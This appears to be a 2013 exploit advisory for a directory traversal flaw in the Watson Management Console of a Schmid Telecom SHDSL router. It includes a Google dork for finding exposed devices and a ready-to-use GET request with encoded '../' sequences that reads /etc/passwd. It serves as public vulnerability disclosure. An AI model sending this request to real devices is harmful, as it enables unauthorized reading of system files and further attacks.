36 lines
No EOL
1.2 KiB
Text
36 lines
No EOL
1.2 KiB
Text
# Exploit Title: Watson Management Console Directory Traversal Vulnerability
|
|
# Google Dork: allintitle:Watson Management Console
|
|
# Contacted Vendor : 17/12/2012 as well as 31/12/2012 The Vendor Did
|
|
Not Respond .
|
|
# Date: 1/2/2013
|
|
# Exploit Author: Dhruv Shah
|
|
# Vendor Homepage: http://www.schmid-telecom.com/
|
|
# Software Link: N/A
|
|
# Version: 441A800W0G (4.11.2.G)
|
|
# Platform:Hardware
|
|
|
|
Watson Management Console is a ( Watson SHDSL Router 2p 8xEthernet Tabletop )
|
|
|
|
It has been found that Watson Management Console is prone to a
|
|
directory traversal vulnerability. The issue is due to the server's
|
|
failure to properly validate user supplied http requests.
|
|
|
|
This issue may allow an attacker to escape the web server root
|
|
directory and view any web server readable files. Information acquired
|
|
by exploiting this issue may be used to aid further attacks against a
|
|
vulnerable system.
|
|
|
|
http://www.example.com
|
|
|
|
in burpsuite proxy or any proxy http request proxy that u use edit the
|
|
Request paramater to
|
|
|
|
GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
|
|
HTTP/1.1
|
|
|
|
--
|
|
Regards
|
|
Snypter a.k.a Dhruv Shah
|
|
http://blog.snypter.com
|
|
http://www.youtube.com/snypter
|
|
http://www.facebook.com/dhruvshahs |